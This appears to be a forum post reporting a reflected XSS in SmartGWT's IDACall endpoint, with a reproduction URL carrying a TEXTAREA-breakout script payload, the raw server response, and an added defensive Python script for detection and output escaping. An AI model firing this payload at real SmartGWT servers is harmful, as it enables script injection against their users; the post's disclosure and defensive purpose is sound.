Hi,
I ran some vulnerability tests on our system since we are using the SmartGWT framework.
During the testing, we were able to inject a Reflected Cross-Site Scripting (XSS) payload in the IDACall endpoint.
To reproduce the issue, paste the URL below into a browser.
URL:
Code:
http://serverurl/administratortool/sc/IDACall?&isc_rpc=1&isc_tnum=300&_transaction=%3Ctransaction+xmlns%3Axsi%3D%22http%3A//www.w3.org/2000/10/XMLSchema-instance%22+xsi%3Atype%3D%22xsd%3AObject%22%3E%3CtransactionNum+xsi%3Atype%3D%22xsd%3Along%22%3E5%3C/transactionNum%3E%3Coperations+xsi%3Atype%3D%22xsd%3AList%22%3E%3Celem+xsi%3Atype%3D%22xsd%3AObject%22%3E%3CappID%3Eisc_builtin%3C/appID%3E%3CclassName%3Ebuiltin%3C/className%3E%3CmethodName%3Etest123%26lt%3B/TEXTAREA+%26gt%3B%26lt%3Bscript%26gt%3Balert(document.domain)%26lt%3B/script%26gt%3Bl123%3C/methodName%3E%3Cis_ISC_RPC_DMI+xsi%3Atype%3D%22xsd%3Aboolean%22%3Etrue%3C/is_ISC_RPC_DMI%3E%3C/elem%3E%3C/operations%3E%3Ccallback%3Etest123%3C/callback%3E%3C/transaction%3E&protocolVersion=1.0&__iframeTarget__=isc_HiddenFrame_0
We also tested this using Burp Suite, and here's the raw response:
[HTML]
<HTML>
<BODY ONLOAD='var results = document.formResults.results.value;null'><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><FORM name='formResults'><TEXTAREA readonly name='results'>
//isc_RPCResponseStart-->[{data:"Attempt to execute RPC DMI Builtin 'test123</TEXTAREA ><script>alert(document.domain)</script>l123' DENIED by server.properties configuration. To enable this method, add it to the list of methods under RPCManager.enabledBuiltinMethods in server.properties",status:-1}]//isc_RPCResponseEnd</TEXTAREA></FORM>
</BODY></HTML>
[/HTML]
May I ask if this is a vulnerability issue that came from the SmartGWT framework?
Is there a recommended way to prevent it?
Thank you.
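As an added illustration (not SmartGWT's code, and not part of the original post), the script below shows the two defensive checks a practitioner would want for the request and response quoted above: decoding the `_transaction` parameter to pull out the `methodName` values that an IDACall request carries, flagging names that contain markup characters, and rendering the results page with and without HTML output encoding so the difference in the `TEXTAREA` breakout is observable. The URL is the one from the post with its `serverurl` placeholder kept; the response template is modelled on the posted response but shortened (no `<BR>` padding, no `ONLOAD` handler), and the function and variable names are this example's own.

```python
import html
import re
import xml.etree.ElementTree as ET
from urllib.parse import parse_qs, urlsplit

# Constructed sample request: the IDACall URL quoted in the post, host kept as the
# placeholder "serverurl". The payload sits inside the URL-encoded _transaction XML,
# where it is additionally XML-entity-encoded (%26lt%3B is "&lt;").
SAMPLE_URL = (
    "http://serverurl/administratortool/sc/IDACall?&isc_rpc=1&isc_tnum=300"
    "&_transaction=%3Ctransaction+xmlns%3Axsi%3D%22http%3A//www.w3.org/2000/10/"
    "XMLSchema-instance%22+xsi%3Atype%3D%22xsd%3AObject%22%3E%3CtransactionNum+"
    "xsi%3Atype%3D%22xsd%3Along%22%3E5%3C/transactionNum%3E%3Coperations+"
    "xsi%3Atype%3D%22xsd%3AList%22%3E%3Celem+xsi%3Atype%3D%22xsd%3AObject%22%3E"
    "%3CappID%3Eisc_builtin%3C/appID%3E%3CclassName%3Ebuiltin%3C/className%3E"
    "%3CmethodName%3Etest123%26lt%3B/TEXTAREA+%26gt%3B%26lt%3Bscript%26gt%3B"
    "alert(document.domain)%26lt%3B/script%26gt%3Bl123%3C/methodName%3E"
    "%3Cis_ISC_RPC_DMI+xsi%3Atype%3D%22xsd%3Aboolean%22%3Etrue%3C/is_ISC_RPC_DMI%3E"
    "%3C/elem%3E%3C/operations%3E%3Ccallback%3Etest123%3C/callback%3E"
    "%3C/transaction%3E&protocolVersion=1.0&__iframeTarget__=isc_HiddenFrame_0"
)

# Characters an RPC method name never legitimately needs; any hit is worth logging.
MARKUP = re.compile(r"[<>\"']")


def method_names(url: str) -> list[str]:
    """Decode the _transaction parameter and return every methodName value in it."""
    query = parse_qs(urlsplit(url).query)  # percent-decoding, '+' becomes a space
    names: list[str] = []
    for xml_text in query.get("_transaction", []):
        root = ET.fromstring(xml_text)  # XML entity decoding (&lt; -> <) happens here
        names.extend(node.text or "" for node in root.iter("methodName"))
    return names


def suspicious_method_names(url: str) -> list[str]:
    """Method names carrying markup characters, suitable for a request-side alert."""
    return [name for name in method_names(url) if MARKUP.search(name)]


def render_results(message: str, escape_output: bool) -> str:
    """Build a results page in the shape of the posted response (hypothetical template).

    escape_output=False reproduces the unencoded reflection seen in the post;
    escape_output=True is the hardened form: HTML-escape before embedding the text.
    """
    body = html.escape(message, quote=True) if escape_output else message
    return (
        "<HTML><BODY><FORM name='formResults'>"
        f"<TEXTAREA readonly name='results'>{body}</TEXTAREA>"
        "</FORM></BODY></HTML>"
    )


def textarea_intact(document: str) -> bool:
    """True when the results TEXTAREA is closed exactly once and no <script> element
    exists anywhere in the page, i.e. the reflected text could not break out of it."""
    closes = re.findall(r"</textarea", document, re.IGNORECASE)
    has_script_element = re.search(r"<script", document, re.IGNORECASE) is not None
    return len(closes) == 1 and not has_script_element


if __name__ == "__main__":
    name = method_names(SAMPLE_URL)[0]
    message = f"Attempt to execute RPC DMI Builtin '{name}' DENIED by server.properties configuration."
    print("suspicious:", suspicious_method_names(SAMPLE_URL))
    print("unencoded reflection keeps TEXTAREA intact:", textarea_intact(render_results(message, False)))
    print("HTML-escaped reflection keeps TEXTAREA intact:", textarea_intact(render_results(message, True)))
```

The point of the second half is that the server's authorisation check in the posted response did its job (the builtin method was denied), but the error text still echoed the method name verbatim into an HTML context; output encoding at that point is what removes the reflected XSS, independently of which methods `RPCManager.enabledBuiltinMethods` allows. The first half is the request-side check a WAF rule or access-log review could apply to IDACall traffic.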